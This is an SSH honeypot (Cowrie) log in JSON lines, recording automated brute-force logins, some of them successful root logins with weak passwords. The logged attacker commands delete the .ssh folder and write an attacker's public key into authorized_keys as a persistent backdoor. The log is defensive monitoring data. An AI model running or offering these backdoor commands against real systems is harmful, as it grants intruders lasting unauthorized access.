{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:50:56.674767Z","src_ip":"212.227.235.229","session":"e51b5e8a605d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:50:56.798559Z","src_ip":"212.227.235.229","session":"e51b5e8a605d"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:50:56.799601Z","src_ip":"212.227.235.229","session":"61d7f50e1526"}
{"eventid":"cowrie.login.failed","username":"es","password":"Password1","message":"login attempt [es/Password1] failed","sensor":"my-vps","timestamp":"2025-09-08T14:50:56.902304Z","src_ip":"158.51.124.56","session":"a28ff6de17d0"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:50:58.044423Z","src_ip":"158.51.124.56","session":"a28ff6de17d0"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":46976,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3fcd33f8b21","protocol":"ssh","message":"New connection: 185.255.91.51:46976 (1.2.3.4:22) [session: a3fcd33f8b21]","sensor":"my-vps","timestamp":"2025-09-08T14:51:31.024386Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:51:31.037895Z","src_ip":"185.255.91.51","session":"a3fcd33f8b21"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:51:31.130105Z","src_ip":"185.255.91.51","session":"a3fcd33f8b21"}
{"eventid":"cowrie.login.failed","username":"install","password":"1234567","message":"login attempt [install/1234567] failed","sensor":"my-vps","timestamp":"2025-09-08T14:51:31.509529Z","src_ip":"185.255.91.51","session":"a3fcd33f8b21"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:51:32.605491Z","src_ip":"185.255.91.51","session":"a3fcd33f8b21"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":49576,"dst_ip":"1.2.3.4","dst_port":22,"session":"8d911f96b4df","protocol":"ssh","message":"New connection: 158.51.124.56:49576 (1.2.3.4:22) [session: 8d911f96b4df]","sensor":"my-vps","timestamp":"2025-09-08T14:52:01.493549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:52:01.494742Z","src_ip":"158.51.124.56","session":"8d911f96b4df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60846,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7a8016f874b","protocol":"ssh","message":"New connection: 212.227.235.229:60846 (1.2.3.4:22) [session: f7a8016f874b]","sensor":"my-vps","timestamp":"2025-09-08T14:52:01.580354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:52:01.581574Z","src_ip":"212.227.235.229","session":"f7a8016f874b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:52:01.633006Z","src_ip":"158.51.124.56","session":"8d911f96b4df"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:52:01.702199Z","src_ip":"212.227.235.229","session":"f7a8016f874b"}
{"eventid":"cowrie.login.success","username":"root","password":"1234!@#$qwerQWER","message":"login attempt [root/1234!@#$qwerQWER] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:52:02.188968Z","src_ip":"158.51.124.56","session":"8d911f96b4df"}
{"eventid":"cowrie.login.failed","username":"vncuser","password":"!","message":"login attempt [vncuser/!] failed","sensor":"my-vps","timestamp":"2025-09-08T14:52:02.224755Z","src_ip":"212.227.235.229","session":"f7a8016f874b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:52:02.486642Z","src_ip":"158.51.124.56","session":"8d911f96b4df"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:52:02.487371Z","src_ip":"158.51.124.56","session":"8d911f96b4df"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:52:02.488155Z","src_ip":"158.51.124.56","session":"8d911f96b4df"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:52:02.628311Z","src_ip":"158.51.124.56","session":"8d911f96b4df"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:52:03.028370Z","src_ip":"158.51.124.56","session":"8d911f96b4df"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:52:03.029410Z","src_ip":"158.51.124.56","session":"8d911f96b4df"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:52:03.171280Z","src_ip":"158.51.124.56","session":"8d911f96b4df"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:52:03.172205Z","src_ip":"158.51.124.56","session":"8d911f96b4df"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":50126,"dst_ip":"1.2.3.4","dst_port":22,"session":"726465582360","protocol":"ssh","message":"New connection: 158.51.124.56:50126 (1.2.3.4:22) [session: 726465582360]","sensor":"my-vps","timestamp":"2025-09-08T14:52:03.309158Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:52:03.310068Z","src_ip":"158.51.124.56","session":"726465582360"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:52:03.347208Z","src_ip":"212.227.235.229","session":"f7a8016f874b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:52:03.448569Z","src_ip":"158.51.124.56","session":"726465582360"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:52:04.044133Z","src_ip":"158.51.124.56","session":"726465582360"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:52:05.184608Z","src_ip":"158.51.124.56","session":"726465582360"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":51040,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ef11c8e3499","protocol":"ssh","message":"New connection: 158.51.124.56:51040 (1.2.3.4:22) [session: 9ef11c8e3499]","sensor":"my-vps","timestamp":"2025-09-08T14:52:05.322445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:52:05.323391Z","src_ip":"158.51.124.56","session":"9ef11c8e3499"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:52:05.462483Z","src_ip":"158.51.124.56","session":"9ef11c8e3499"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:52:06.061512Z","src_ip":"158.51.124.56","session":"9ef11c8e3499"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:52:06.201970Z","src_ip":"158.51.124.56","session":"8d911f96b4df"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:52:06.202722Z","src_ip":"158.51.124.56","session":"9ef11c8e3499"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":55742,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e5cdb30cd55","protocol":"ssh","message":"New connection: 185.255.91.51:55742 (1.2.3.4:22) [session: 0e5cdb30cd55]","sensor":"my-vps","timestamp":"2025-09-08T14:52:38.772585Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:52:38.773442Z","src_ip":"185.255.91.51","session":"0e5cdb30cd55"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:52:38.870301Z","src_ip":"185.255.91.51","session":"0e5cdb30cd55"}
{"eventid":"cowrie.login.success","username":"root","password":"iddqdidkfa","message":"login attempt [root/iddqdidkfa] succeeded","sensor":"my-vps","timestamp":"2025-09-08T14:52:39.287644Z","src_ip":"185.255.91.51","session":"0e5cdb30cd55"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:52:39.498078Z","src_ip":"185.255.91.51","session":"0e5cdb30cd55"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:52:39.498783Z","src_ip":"185.255.91.51","session":"0e5cdb30cd55"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T14:52:39.499730Z","src_ip":"185.255.91.51","session":"0e5cdb30cd55"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:52:39.595697Z","src_ip":"185.255.91.51","session":"0e5cdb30cd55"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T14:52:39.878608Z","src_ip":"185.255.91.51","session":"0e5cdb30cd55"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T14:52:39.879332Z","src_ip":"185.255.91.51","session":"0e5cdb30cd55"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T14:52:39.974533Z","src_ip":"185.255.91.51","session":"0e5cdb30cd55"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:52:39.975356Z","src_ip":"185.255.91.51","session":"0e5cdb30cd55"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":55756,"dst_ip":"1.2.3.4","dst_port":22,"session":"549696c13e62","protocol":"ssh","message":"New connection: 185.255.91.51:55756 (1.2.3.4:22) [session: 549696c13e62]","sensor":"my-vps","timestamp":"2025-09-08T14:52:40.069695Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T14:52:40.070691Z","src_ip":"185.255.91.51","session":"549696c13e62"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T14:52:40.165529Z","src_ip":"185.255.91.51","session":"549696c13e62"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T14:52:40.588231Z","src_ip":"185.255.91.51","session":"549696c13e62"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T14:52:41.685521Z","src_ip":"185.255.91.51","session":"549696c13e62"}
